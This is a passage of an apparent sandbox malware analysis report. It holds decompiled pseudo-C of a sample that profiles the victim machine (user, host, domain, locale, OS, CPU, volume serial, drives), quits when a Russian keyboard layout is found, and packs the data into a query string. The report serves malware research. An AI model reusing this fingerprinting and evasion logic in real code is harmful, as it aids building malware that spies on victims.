						}
						E0FBC6390( &_v80);
						_v32 = 0;
						_v20 = 0;
						_v52 = 0;
						_v60 = 0;
						__eflags = _v16;
						if(_v16 == 0) {
							L19:
							E0FBC4030();
							InitializeCriticalSection(0xfbd2a48);
							__eflags = _v52;
							if(__eflags == 0) {
								E0FBC3E20( &_v80);
							} else {
								E0FBC4000(_v32, _v20, __eflags);
							}
							DeleteCriticalSection(0xfbd2a48);
							__eflags = E0FBC3AA0();
							if(__eflags != 0) {
								E0FBC43E0(__eflags);
							}
							_v24 = VirtualAlloc(0, 0x200, 0x3000, 4);
							__eflags = _v24;
							if(__eflags != 0) {
								GetModuleFileNameW(0, _v24, 0x100);
								E0FBC3BE0(_v24, _v24, __eflags);
								VirtualFree(_v24, 0, 0x8000);
							}
							__eflags =  *0xfbd2a44;
							if( *0xfbd2a44 != 0) {
								_t97 =  *0xfbd2a44; // 0x60000
								ShellExecuteW(0, L"open", _t97, 0, 0, 5);
							}
							ExitThread(0);
						}
						_v20 = lstrlenA(_v16);
						_v32 = VirtualAlloc(0, _v20, 0x3000, 4);
						_t79 = CryptStringToBinaryA(_v16, 0, 1, _v32,  &_v20, 0, 0);
						__eflags = _t79;
						if(_t79 != 0) {
							_v52 = 1;
							goto L19;
						}
						ExitProcess(0);
					} else {
						_v12 = VirtualAlloc(0, 0x200, 0x3000, 4);
						_t119 = _v12;
						if(_v12 != 0) {
							GetModuleFileNameW(0, _v12, 0x100);
							E0FBC3BE0(_v12,  &_v44, _t119);
							VirtualFree(_v12, 0, 0x8000);
						}
						ExitProcess(0);
					}
				}
				ExitProcess(0); // executed
			}

APIs

Sleep.KERNELBASE(000003E8), ref: 0FBC495B

Part of subcall function 0FBC4600: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC465C
Part of subcall function 0FBC4600: lstrcpyW.KERNEL32 ref: 0FBC467F
Part of subcall function 0FBC4600: lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC4686
Part of subcall function 0FBC4600: CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC469E
Part of subcall function 0FBC4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC46AA
Part of subcall function 0FBC4600: GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC46B1
Part of subcall function 0FBC4600: VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC46CB

ExitProcess.KERNEL32 ref: 0FBC496C
CreateThread.KERNEL32 ref: 0FBC4981
WaitForSingleObject.KERNEL32(00000000,00001388), ref: 0FBC4999
TerminateThread.KERNEL32(00000000,00000000), ref: 0FBC49AC
CloseHandle.KERNEL32(00000000), ref: 0FBC49B6
VirtualAlloc.KERNEL32(00000000,00000200,00003000,00000004,00000000,00000000,00000000,00000000), ref: 0FBC4A2A
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FBC4A44
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC4A5D
ExitProcess.KERNEL32 ref: 0FBC4A65

Strings

open, xrefs: 0FBC4BC0

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$AllocCreateErrorExitFreeLastProcessThread$CloseFileHandleModuleMutexNameObjectSingleSleepTerminateWaitlstrcpylstrlen
String ID: open
API String ID: 1803241880-2758837156
Opcode ID: 8eac0ac5db6267d11355422d4e8bf90c6563e033f1cb4607bf3360a43daf6d8b
Instruction ID: 6c093c87acd108faf95323a79afe817e92a75b64ba8e3401ae431015423a6a57
Opcode Fuzzy Hash: 8eac0ac5db6267d11355422d4e8bf90c6563e033f1cb4607bf3360a43daf6d8b
Instruction Fuzzy Hash: D4711F70A40309EBEB14DBA1EC69FDF7778EB48B12F104098E2016B1C1D7B86645CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC7330 Relevance: 144.0, APIs: 55, Strings: 27, Instructions: 499
memorystringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E0FBC7330(DWORD* __ecx, void* __edx) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				int _v24;
				int _v28;
				intOrPtr _v32;
				short _v36;
				short _v40;
				WCHAR* _v44;
				WCHAR* _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				WCHAR* _v60;
				WCHAR* _v64;
				WCHAR* _v68;
				signed short _v76;
				char _v132;
				void* _t154;
				long _t155;
				short _t158;
				short _t159;
				short _t160;
				signed int _t161;
				signed int _t166;
				void* _t181;
				signed int _t183;
				signed int _t186;
				WCHAR* _t190;
				void* _t191;
				void* _t199;
				_Unknown_base(*)()* _t204;
				signed int _t211;
				intOrPtr _t216;
				WCHAR* _t218;
				WCHAR* _t220;
				void* _t224;
				int _t230;
				void* _t238;
				WCHAR* _t246;
				void* _t247;
				WCHAR* _t249;
				WCHAR* _t250;
				WCHAR* _t252;
				void* _t256;
				DWORD* _t260;
				short* _t261;
				DWORD* _t266;
				void* _t267;
				signed int _t270;
				void* _t274;
				void* _t276;
				void* _t277;
				DWORD* _t279;
				void* _t280;
				void* _t281;

				_t267 = __edx;
				_t260 = __ecx;
				_t279 = __ecx;
				if( *__ecx != 0) {
					_t252 = VirtualAlloc(0, 0x202, 0x3000, 4);
					_t260 =  &_v24;
					 *(_t279 + 8) = _t252;
					_v24 = 0x100;
					GetUserNameW(_t252, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0xc)) != 0) {
					_v24 = 0x1e;
					_t250 = VirtualAlloc(0, 0x20, 0x3000, 4);
					_t260 =  &_v24;
					 *(_t279 + 0x14) = _t250;
					GetComputerNameW(_t250, _t260);
				}
				if( *((intOrPtr*)(_t279 + 0x18)) == 0) {
					L11:
					if( *(_t279 + 0x30) == 0) {
						L18:
						if( *((intOrPtr*)(_t279 + 0x3c)) == 0) {
							L31:
							if( *((intOrPtr*)(_t279 + 0x48)) != 0) {
								_t220 = VirtualAlloc(0, 0x82, 0x3000, 4);
								_push(_t260);
								 *(_t279 + 0x50) = _t220;
								if(E0FBC72B0(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80) == 0) {
									_push(_t260);
									E0FBC72B0(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0FBC7A10(_t279 + 0x2c,  &_v28);
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0FBC72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0FBC72B0(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4);
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0FBC6E90(_t154);
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000);
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									 *(_t279 + 0x7c) = VirtualAlloc(0, 0x400, 0x3000, 4);
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xfbcf348; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t270 = GetDriveTypeW( &_v40);
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											if(GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16) == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0FBC8950(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0FBC8950(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76);
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4);
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0FBC7A00) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0FBC79EC))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4);
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						 *(_t279 + 0x44) = VirtualAlloc(0, 4, 0x3000, 4);
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							if(RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12) != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							if(RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28) != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12);
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000);
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4);
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					if(RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8) != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					if(RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24) != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8);
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0FBC72B0(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FBC7357
GetUserNameW.ADVAPI32(00000000,?), ref: 0FBC7368
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FBC7386
GetComputerNameW.KERNEL32 ref: 0FBC7390
VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBC73B0
wsprintfW.USER32 ref: 0FBC73F1
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBC740E
RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBC7432
RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0FBC4640,?), ref: 0FBC7456
GetLastError.KERNEL32 ref: 0FBC7469
RegCloseKey.ADVAPI32(00000000), ref: 0FBC7472
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC748F
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0FBC74AD
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FBC74C3
wsprintfW.USER32 ref: 0FBC74DD
RegOpenKeyExW.ADVAPI32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0FBC74FF
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,0FBC4640,?), ref: 0FBC7521
GetLastError.KERNEL32 ref: 0FBC7534
RegCloseKey.ADVAPI32(?), ref: 0FBC753D
lstrcmpiW.KERNEL32(0FBC4640,00000419), ref: 0FBC7551
wsprintfW.USER32 ref: 0FBC757E
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC758D
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0FBC75AD
wsprintfW.USER32 ref: 0FBC75F6
GetNativeSystemInfo.KERNEL32(?), ref: 0FBC7605
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0FBC7616
wsprintfW.USER32 ref: 0FBC763A
ExitProcess.KERNEL32 ref: 0FBC7641
wsprintfW.USER32 ref: 0FBC7669
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000004), ref: 0FBC76A7
VirtualAlloc.KERNELBASE(00000000,00000E0C,00003000,00000004), ref: 0FBC76BA
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0FBC76C4
GetVolumeInformationW.KERNELBASE(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0FBC76FE
lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FBC7730
wsprintfW.USER32 ref: 0FBC7768
lstrcatW.KERNEL32(?,0000060C), ref: 0FBC777D
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0FBC7789
GetProcAddress.KERNEL32(00000000), ref: 0FBC7790
lstrlenW.KERNEL32(?), ref: 0FBC77A0
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FBC77D1

Part of subcall function 0FBC7A10: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,772966A0,?,76F0C0B0), ref: 0FBC7A2D
Part of subcall function 0FBC7A10: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FBC7AA1
Part of subcall function 0FBC7A10: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FBC7AB6
Part of subcall function 0FBC7A10: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC7ACC

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FBC7828
GetDriveTypeW.KERNEL32(?), ref: 0FBC786F
lstrcatW.KERNEL32(?,?), ref: 0FBC7896
lstrcatW.KERNEL32(?,0FBD029C), ref: 0FBC78A8
lstrcatW.KERNEL32(?,0FBD0310), ref: 0FBC78B2
GetDiskFreeSpaceW.KERNEL32(?,?,0FBC4640,?,00000000), ref: 0FBC78C8
lstrlenW.KERNEL32(?,?,00000000,0FBC4640,00000000,00000000,00000000,0FBC4640,00000000), ref: 0FBC7910
wsprintfW.USER32 ref: 0FBC792A
lstrlenW.KERNEL32(?), ref: 0FBC7938
wsprintfW.USER32 ref: 0FBC794C
lstrcatW.KERNEL32(?,0FBD0330), ref: 0FBC795F
lstrcatW.KERNEL32(?,0FBD0334), ref: 0FBC796B
lstrlenW.KERNEL32(?), ref: 0FBC7986
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0FBC79A9
VirtualFree.KERNEL32(?,00000000,00008000,00000000), ref: 0FBC79D0

Strings

LocaleName, xrefs: 0FBC744E
%I64u, xrefs: 0FBC7943
Control Panel\International, xrefs: 0FBC7421
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 0FBC73C5
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0FBC7716, 0FBC774B
ProcessorNameString, xrefs: 0FBC7711
x86, xrefs: 0FBC765C
Keyboard Layout\Preload, xrefs: 0FBC74F5
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0FBC75BB
x64, xrefs: 0FBC7647
00000419, xrefs: 0FBC7549
@, xrefs: 0FBC743F
ARM, xrefs: 0FBC764E
i)w, xrefs: 0FBC7551
%I64u/, xrefs: 0FBC7924
productName, xrefs: 0FBC75B6, 0FBC75DA
WORKGROUP, xrefs: 0FBC73E1
undefined, xrefs: 0FBC73E9
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 0FBC75DF
ntdll.dll, xrefs: 0FBC7784
Itanium, xrefs: 0FBC7655
Identifier, xrefs: 0FBC7746
Unknown, xrefs: 0FBC7663
error, xrefs: 0FBC75EE
Domain, xrefs: 0FBC73C0
?:\, xrefs: 0FBC784D
RtlComputeCrc32, xrefs: 0FBC777F

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
String ID: i)w$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 153366582-3138453034
Opcode ID: e342559c9d55da90519c63d991e5396c0609ec16c20b5ce54fd58928a79e4950
Instruction ID: fa781fae306e15acc4b55f4b6e5ee64242c8a41e1d07d13a1a447a360c254935
Opcode Fuzzy Hash: e342559c9d55da90519c63d991e5396c0609ec16c20b5ce54fd58928a79e4950
Instruction Fuzzy Hash: A812B470640309BFEB219F61EC46FABBBB8FF08701F200599F641A6191EBB4A515CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC6F40 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC6F40(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

APIs

lstrcatW.KERNEL32(?,?), ref: 0FBC6F61
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC6F69
lstrcatW.KERNEL32(?,?), ref: 0FBC6F72
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC6F7A
lstrcatW.KERNEL32(?,?), ref: 0FBC6F85
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC6F8D
lstrcatW.KERNEL32(?,?), ref: 0FBC6F93
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC6F9B
lstrcatW.KERNEL32(?,?), ref: 0FBC6FA7
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC6FAF
lstrcatW.KERNEL32(?,?), ref: 0FBC6FB5
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC6FBD
lstrcatW.KERNEL32(?,?), ref: 0FBC6FC9
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC6FD1
lstrcatW.KERNEL32(?,?), ref: 0FBC6FD7
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC6FDF
lstrcatW.KERNEL32(?,?), ref: 0FBC6FEB
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC6FF3
lstrcatW.KERNEL32(?,?), ref: 0FBC6FF9
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC7001
lstrcatW.KERNEL32(?,?), ref: 0FBC700D
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC7015
lstrcatW.KERNEL32(?,?), ref: 0FBC701B
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC7023
lstrcatW.KERNEL32(?,0FBC4966), ref: 0FBC702F
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC7037
lstrcatW.KERNEL32(?,?), ref: 0FBC703D
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC7045
lstrcatW.KERNEL32(?,?), ref: 0FBC7051
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC7059
lstrcatW.KERNEL32(?,?), ref: 0FBC705F
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC7067
lstrcatW.KERNEL32(?,?), ref: 0FBC7073
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC707B
lstrcatW.KERNEL32(?,?), ref: 0FBC7081
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC7089
VirtualAlloc.KERNELBASE(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0FBC4699,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0FBC709C
wsprintfW.USER32 ref: 0FBC70B6
wsprintfW.USER32 ref: 0FBC70C7
lstrcatW.KERNEL32(?,?), ref: 0FBC70D4
lstrcatW.KERNEL32(?,0FBCFF50), ref: 0FBC70DC
lstrcatW.KERNEL32(?,?), ref: 0FBC70E2
lstrcatW.KERNEL32(?,0FBCFF54), ref: 0FBC70EA
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0FBC70F6
lstrcatW.KERNEL32(?,?), ref: 0FBC7106
